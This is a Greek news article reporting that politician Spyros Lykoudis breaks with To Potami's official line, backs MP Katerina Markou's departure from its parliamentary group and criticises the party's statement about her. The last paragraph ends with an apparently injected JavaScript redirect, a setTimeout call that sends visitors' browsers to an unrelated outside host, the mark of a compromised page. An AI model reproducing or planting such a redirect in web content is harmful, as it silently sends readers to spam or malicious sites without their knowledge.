Εκτός «γραμμής» και υπέρ Μάρκου ο Λυκούδης: Δεν συμφωνώ με το Ποτάμι

0
9

 

 Υπέρ της Κατερίνας Μάρκου που αποχώρησε από την ΚΟ του Ποταμιού τάχθηκε ο Σπύρος Λυκούδης, οπαδός της συγκρότησης της κεντροαριστεράς. Ο κ.Λυκούδης επέκρινε το περιεχόμενο της ανακοίνωσης του  Ποταμιού, ξεκαθαρίζοντας πως «σε αυτό το επίπεδο εγώ δεν μπορώ να λειτουργήσω».

Υπογράμμισε μάλιστα ότι η ανεξαρτητοποίηση της βουλευτού δεν τον αιφνιδίασε, ενώ επί της ουσίας υιοθέτησε το σκεπτικό της, υποστηρίζοντας ότι το Ποτάμι δεν κατάφερε, λόγω και των δικών του ευθυνών, να πρωταγωνιστήσει «στην μεγάλη αναγεννητική προσπάθεια ανασυγκρότησης του δημοκρατικού και μεταρρυθμιστικού χώρου» και πως το κόμμα, λόγω της διάχυτης ασάφειας και του ελλείμματος στην πολιτική του ταυτότητα και στην στρατηγική του, ευνοεί τέτοιες φυγόκεντρες τάσεις.

Μιλώντας στον ραδιιοφωνικό σταθμό της ΕΡΤ, υποστήριξε ότι η κριτική στην κυρία Μάρκου θα έπρεπε να είναι πολιτικού χαρακτήρα και προσέθεσε: «Εμένα και το περιεχόμενο και το ύφος της ανακοίνωσης-απάντησης στην κυρία Μάρκου δεν με βρίσκει σύμφωνο. Χρειάζεται πολιτικού χαρακτήρα αντιμετώπιση και όχι κριτικές του τύπου «ξερουμε ποια είναι τα ελατήριά σου και τι ήθελες να κερδίσεις και ποιες είναι οι προθέσεις σου»». Σε αυτό το επίπεδο εγώ δεν μπορώ να λειτουργήσω».

Μιλώντας αργότερα στον τηλεοπτικό σταθμό ΣΚΑΙ αναφέρθηκε εκ νέου στο θέμα.

Υποστήριξε ότι το Ποτάμι πρέπει να αποσαφηνίσει τι είναι και τι θέλει «όλες οι επιλογές είναι θεμιτές, καμιά επιχειρηματολογία δεν είναι ύποπτη ούτε ένοχη, αλλά χρειάζεται αποσαφήνιση» τόνισε.

Ερωτηθείς τέλος για το τι πρόκειται ο ίδιος να πράξει σε περίπτωση πρόωρων εκλογών, απάντησε ότι θα κινηθεί με βάση τη συνείδησή του και τη συνεννόηση με τους «Μεταρρυθμιστές» λέγοντας χαρακτηριστικά: «Θα κινηθώ με βάση την δική μου ιστορία και διαδρομή, άλλωστε δεν είναι όλα προδιαγραμμένα για τον καθένα. Υπάρχει και το σπίτι μας, αν δεν εμφανιστούν οι αναγκαίες πολιτικές επιλογές» κατέληξε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here